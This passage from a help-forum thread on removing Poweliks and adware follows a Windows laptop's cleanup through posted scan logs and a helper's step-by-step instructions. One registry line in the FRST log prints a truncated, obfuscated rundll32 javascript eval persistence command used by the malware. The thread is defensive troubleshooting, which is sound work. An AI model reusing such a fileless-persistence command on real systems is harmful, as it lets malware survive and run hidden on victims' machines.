mp3PRO Plug-in (HKLM-x32\...\{9cd15289-0ff2-4ab9-9b8b-d3a120b43c84}) (Version:  - Nero AG)
MSVCRT (x32 Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB936181) (HKLM-x32\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Life Story (HKLM-x32\...\My Life Story1.0) (Version: 1.0 - AllSmartGames)
Nero BackItUp 4 (HKLM-x32\...\{2b15b99d-dcef-48ab-889e-e4a65393da0f}) (Version:  - Nero AG)
Nero ControlCenter (x32 Version: 0.0.0.1 - Nero AG) Hidden
Nero ControlCenter (x32 Version: 9.0.0.1 - Nero AG) Hidden
Nero InCD-Reader (HKLM-x32\...\{31a26041-7b9c-49e0-b739-aaa2fe5fd1d4}) (Version:  - Nero AG)
Nero Installer (x32 Version: 2.0.0.1 - Nero AG) Hidden
Nero MediaHome 4 (HKLM-x32\...\{01ca97d3-1823-4a9e-8170-d142f97ffbbe}) (Version:  - Nero AG)
Nero Move it (HKLM-x32\...\{cf6bdcfe-40f9-49bf-8b01-71446c89e332}) (Version:  - Nero AG)
neroxml (x32 Version: 1.0.0 - Nero AG) Hidden
Nessus64 (HKLM\...\{7808E43D-2A8C-4F62-B7DC-558B7185B2CF}) (Version: 4.4.1.15078 - Tenable Network Security, Inc.)
Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NirSoft BlueScreenView (HKLM-x32\...\NirSoft BlueScreenView) (Version:  - )
Nmap 5.51 (HKLM-x32\...\Nmap) (Version:  - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.5 - )
Ogg Codecs 0.81.15562 (HKLM\...\Ogg Codecs) (Version: 0.81.15562 - Xiph.Org)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Oracle VM VirtualBox 4.0.2 (HKLM\...\{ADCF7C16-C3AC-4AFB-A738-968C86A5C2CF}) (Version: 4.0.2 - Oracle Corporation)
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
QuickSet (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 9.0.12 - Dell Inc.)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RCT3 Soaked (HKLM-x32\...\{EA926717-CE5A-4CB4-AB21-9E6E9565A458}) (Version: 1.00.000 - )
RICOH R5C83x/84x Flash Media Controller Driver Ver.3.54.05 (HKLM-x32\...\{59F6A514-9813-47A3-948C-8A155460CC2A}) (Version: 3.54.05 - RICOH)
Rosetta Stone Version 3 (HKLM-x32\...\{148E08FF-D7C4-46ED-8D4D-601C67FE0AFD}) (Version: 3.3.5.2 - Rosetta Stone Ltd.)
RPG Maker VX RTP (HKLM-x32\...\RPG Maker VX RTP =XWareM2 Group=_is1) (Version:  - )
runtime64 (Version: 1.0.0 - immunet) Hidden
Scan (x32 Version: 140.0.167.000 - Hewlett-Packard) Hidden
School Tycoon (HKLM-x32\...\{7CFFE053-748A-44DC-A248-06EA38E4BC03}) (Version:  - )
SDK Debuggers (x32 Version: 8.37.0 - Microsoft Corporation) Hidden
SeaMonkey (1.1.16) (HKLM-x32\...\SeaMonkey (1.1.16)) (Version:  - )
SecurDisc Viewer (HKLM-x32\...\{e801a8d6-855e-4138-8eed-b60eeb1637c6}) (Version:  - Nero AG)
SensePost Wikto (HKLM-x32\...\{3DDFA9CC-53EF-48F6-ACA9-93172E25DF70}) (Version: 2.0 - SensePost)
SimCity 4 Deluxe (HKLM-x32\...\{A7A34FC9-DF24-4A36-00AD-D4EFE94CC116}) (Version:  - )
SimCity™ Societies (HKLM-x32\...\{9B0F9788-3141-4009-846E-52E59843E963}) (Version: 1.0.0.0 - Electronic Arts)
SimCity™ Societies (x32 Version: 1.0.0.0 - Electronic Arts) Hidden
SimCity™ Societies Destinations (HKLM-x32\...\{D1C7BB12-BE01-11DC-AAC9-EEBA55D89593}) (Version: 1.0.0.1 - Electronic Arts)
Sleuth 1.4.3 (International Build) (HKLM-x32\...\Sleuth 1.4.3 (International Build)_is1) (Version: 1.4.3 - David Zimmer)
SoulSeek 157 NS 13c (HKLM-x32\...\Soulseek2) (Version:  - )
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.6.1020 - SUPERAntiSpyware.com)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab for Intel (HKLM-x32\...\{C71067FC-288F-4E0B-88C6-44DFDA8311E2}) (Version: 4.5.9.0 - Husdawg, LLC)
Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden
Unknown Device Identifier 8.01 (HKLM\...\Unknown Device Identifier_is1) (Version: 8.01 - Huntersoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM-x32\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2473228) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_ENTERPRISE_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM-x32\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM-x32\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM-x32\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2863811) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{53DEC068-4690-4F6B-9946-7D21EF02236B}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2889914) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{F3F83933-75FC-4B60-84F2-3F8FA63D042E}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM-x32\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.4053 (x32 Version: 1.1.0 - DivX, Inc) Hidden
Virtual Villagers - New Believers Just For Fun Games (HKLM-x32\...\Virtual Villagers - New Believers Just For Fun Games) (Version:  - )
VirtualCloneDrive (HKLM-x32\...\VirtualCloneDrive) (Version: 5.4.7.0 - Elaborate Bytes)
Vista Codec Package (HKLM-x32\...\{F9FD80CE-0448-4D4F-8BCD-77FC514C3F99}) (Version: 5.0.5 - Shark007)
Visual C++ 2008 x86 Runtime - (v9.0.30729) (x32 Version: 9.0.30729 - Microsoft Corporation) Hidden
Visual C++ 2008 x86 Runtime - v9.0.30729.01 (HKLM-x32\...\{F333A33D-125C-32A2-8DCE-5C5D14231E27}.vc_x86runtime_30729_01) (Version: 9.0.30729.01 - Microsoft Corporation)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{021C4C4F-C93C-4425-BFFD-C2D16776BFAE}) (Version: 8.0.0.35 - GRISOFT, s.r.o.)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
VS10Runtimex64 (Version: 1.0.0 - sourcefire) Hidden
WebReg (x32 Version: 140.0.213.017 - Hewlett-Packard) Hidden
WhoCrashed 4.02 (HKLM\...\WhoCrashed_is1) (Version:  - Resplendence Software Projects Sp.)
WinDjView 1.0.3 (HKLM-x32\...\WinDjView) (Version: 1.0.3 - Andrew Zhezherun)
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
Windows Live Call (x32 Version: 14.0.8064.0206 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 14.0.8064.206 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8064.0206 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 14.0.8064.206 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 14.0.8064.0206 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM-x32\...\{A1BF9950-8CDB-468E-83FA-EACFB00EA7D5}) (Version: 14.0.8064.206 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
Windows Media Encoder 9 Series (x32 Version: 9.00.3374 - Microsoft Corporation) Hidden
Windows Media Encoder 9 Series x64 Edition (HKLM\...\Windows Media Encoder 9) (Version:  - )
Windows Media Encoder 9 Series x64 Edition (Version: 10.0.0.3822 - Microsoft Corporation) Hidden
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
Windows Software Development Kit (HKLM-x32\...\{9a2c2c20-17e6-43c4-be07-a3e0c5cea9f7}) (Version: 8.37.0 - Microsoft Corporation)
WinPcap 4.1.2 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2001 - CACE Technologies)
WinRAR 4.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wireshark 1.4.4 (HKLM-x32\...\Wireshark) (Version: 1.4.4 - The Wireshark developer community, http://www.wireshark.org)
Wise Registry Cleaner 7.87 (HKLM-x32\...\Wise Registry Cleaner_is1) (Version: 7.87 - WiseCleaner.com, Inc.)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ashley\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ashley\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ashley\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\GoogleUpdate.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{1FD1FE74-9E3C-4C1C-AEEB-AAB592AD770F}\localserver32 -> "C:\Users\Ashley\AppData\Local\Facebook\Update\FacebookUpdate.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\1.3.21.79\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\GoogleUpdate.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\1.3.21.79\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Chrome\Application\21.0.1180.89\delegate_execute.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{9E385F0A-0BA2-430C-96AA-4399C5E40F6C}\localserver32 -> C:\PROGRA~2\Skype\Phone\Skype.exe No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\1.3.21.79\GoogleUpdateOnDemand.exe" No File
 
==================== Restore Points  =========================
 

 


Edited by hamluis, 18 October 2014 - 05:30 PM.


BC AdBot (Login to Remove)

 


#2 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 3,976 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:53 PM

Posted 19 October 2014 - 02:06 PM

First we will remove the Adware, then Poweliks.

Step 1: Adwarecleaner

Please download AdwCleaner (by Xplode) from the link below and save it to your Desktop:

Download Mirror #1
  • Right-click on AdwCleaner.exe and select Run as administrator. (If you have Windows XP the just run it)
  • Click Scan and let the scan run.
  • When it finishes, click Clean, following the on screen prompts
  • After your computer reboots, a log will open. Please Copy (Ctrl+C) and Paste (Ctrl+V) this into your next post.
Note: The log can also be found in here: C:\AdwCleaner\

Step 2: Malwarebytes

Please download Malwarebytes Anti-Malware to your desktop Install the progamme and select update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits

MBAMsettings.JPG

Go back to the Dashboard and select Scan Now

MBAMScan.JPG

If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.

MBAMReboot.JPG

MBAMLog.JPG

On completion of the scan (or after the reboot) select View Detailed Log
Select Export > Select text file and save to the desktop
Attach/Post that log

Step 3: Junkware Removal Tool

thisisujrt.gif  Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 4: FRST Scan
  • Run FRST. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • Click Scan to start FRST.
  • When FRST finishes scanning, a log, FRST.txt, will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#3 sp000ky

sp000ky
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:12:53 PM

Posted 19 October 2014 - 08:02 PM

- Ran ADWCleaner, then rebooted. It detected some things but the 30 dllhost processes were still present upon reboot.
- Updated MalwareBytes, checked Scan for rootkits, and did a scan. Nothing detected. Maybe it's because I then disconnected from the Internet, but I went into Task Manager and closed all the dllhost processes and about 20 seemed to not come back. Well, there is one dllhost.exe consuming 40K memory, and then about 10 dllhost.exe with ###CLIENT### in the command line column, each consuming about 4-5K memory. If I close the 40k dllhost.exe process, it eventually returns but only returns ONE process instead of 20. The 10 ###CLIENT### dllhost processes still re-appear after I close them. But.. at least something's changed!..  UPDATE: one of the ###CLIENT### processes just started consuming 140K memory.. that's weird.
- Updated Junkware Removal Tool, then ran scan. Log below
- Ran FRST scan. Looks like it's still detecting Poweliks
 
And now all the dllhost processes are back. Sigh.. 
 
Thanks a million for helping me Machiavelli :)
 
 
AdwCleaner.txt
 
# AdwCleaner v4.000 - Report created 19/10/2014 at 15:23:58
# DB v2014-10-19.11
# Updated 12/10/2014 by Xplode
# Operating System : Windows ™ Vista Home Premium Service Pack 1 (64 bits)
# Username : Ashley - LAPTOP
# Running from : C:\Users\Ashley\Downloads\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage
File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage-journal
File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.plyrics.com_0.localstorage
File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.plyrics.com_0.localstorage-journal
 
***** [ Scheduled Tasks ] *****
 
Task Deleted : Driver Booster Update
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\oejkcgajlodefenbbjdnaiahmbnnoole
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe]
Key Deleted : HKLM\SOFTWARE\dt soft\daemon tools toolbar
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v8.0.6001.19088
 
 
-\\ Mozilla Firefox v32.0.2 (x86 en-US)
 
 
-\\ Google Chrome v38.0.2125.101
 
Deleted [Search Provider] : hxxp://movies.netflix.com/WiSearch?raw_query=lion+king&ac_category_type=none&ac_rel_posn=-1&ac_abs_posn=-1&v1={searchTerms}&search_submit=
Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
 
*************************
 
AdwCleaner[R0].txt - [3793 octets] - [16/02/2014 17:49:36]
AdwCleaner[R1].txt - [2904 octets] - [19/10/2014 15:19:54]
AdwCleaner[S0].txt - [3837 octets] - [16/02/2014 17:51:34]
AdwCleaner[S1].txt - [2768 octets] - [19/10/2014 15:23:58]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [2828 octets] ##########
 
 
 
MBAM.txt
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 10/19/2014
Scan Time: 3:27:50 PM
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.10.19.08
Rootkit Database: v2014.10.17.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows Vista Service Pack 1
CPU: x64
File System: NTFS
User: Ashley
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 600776
Time Elapsed: 51 min, 28 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Deep Rootkit Scan: Enabled
Heuristics: Enabled
PUP: Warn
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
 
 
 
JRT.txt
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.14.2014:1)
OS: Windows ™ Vista Home Premium x64
Ran by Ashley on Sun 10/19/2014 at 16:39:01.47
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
Successfully deleted: [File] "C:\Windows\wininit.ini"
 
 
 
~~~ Folders
 
Successfully deleted: [Folder] "C:\Users\Ashley\AppData\Roaming\getrighttogo"
 
 
 
~~~ FireFox
 
Successfully deleted: [Folder] C:\Users\Ashley\AppData\Roaming\mozilla\firefox\profiles\0w0o55iv.default\extensions\staged
Successfully deleted the following from C:\Users\Ashley\AppData\Roaming\mozilla\firefox\profiles\0w0o55iv.default\prefs.js
 
user_pref("extensions.AMAZON_NS_PH.toolbarXMLText", "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<toolbar>\n  <replacements>\n    <replacement>\n      <key><![CDATA[__REGION__
user_pref("extensions.irc.urls.list", "hxxp%3A//chatzilla.hacksrus.com/faq; hxxp%3A//chatzilla.hacksrus.com/; hxxp%3A//www.irchelp.org/; irc%3A//irc.slacknet.org/; irc%3A//irc
user_pref("google.toolbar.button_option.cached.gtbSearchBlogs", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchBlogs\" t
user_pref("google.toolbar.button_option.cached.gtbSearchPhotos", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchPhotos\"
user_pref("google.toolbar.button_option.cached.gtbSearchScholar", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchScholar
user_pref("google.toolbar.button_option.cached.gtbstoolbar-google-com_CTK0Y7F4MTG6NKYH03WT-xml", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.o
user_pref("google.toolbar.button_option.cached.gtbstoolbar-google-com_J66T77NJDBMW4FEUU7FA-xml", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.o
user_pref("google.toolbar.search-icon", "data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7PT7/3zF6/9Ptu//RbHx/
user_pref("stumble.7279932.recently_seen_publicids", "2SACYC.2f7XRO.27TzKM.3bIYNY.8NAvmo.7MrIx3.A27JIj.2IFZsJ.34RsiH.ApXxU1.1fq0LX.5eqGAt.2iYDUB.1VHu0O.1gBMQP.2vypSy.33nvRu.2k
Emptied folder: C:\Users\Ashley\AppData\Roaming\mozilla\firefox\profiles\0w0o55iv.default\minidumps [90 files]
 
 
 
~~~ Event Viewer Logs were cleared
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sun 10/19/2014 at 17:02:15.28
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
FRST.txt
 
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by Ashley (administrator) on LAPTOP on 19-10-2014 17:03:27
Running from C:\Users\Ashley\Desktop
Loaded Profiles: Ashley & RA Media Server (Available profiles: Ashley & RA Media Server & Mcx1 & Games & Study & Administrator & Guest)
Platform: Windows Vista ™ Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
() C:\Windows\System32\WLTRYSVC.EXE
(Dell Inc.) C:\Windows\System32\BCMWLTRY.EXE
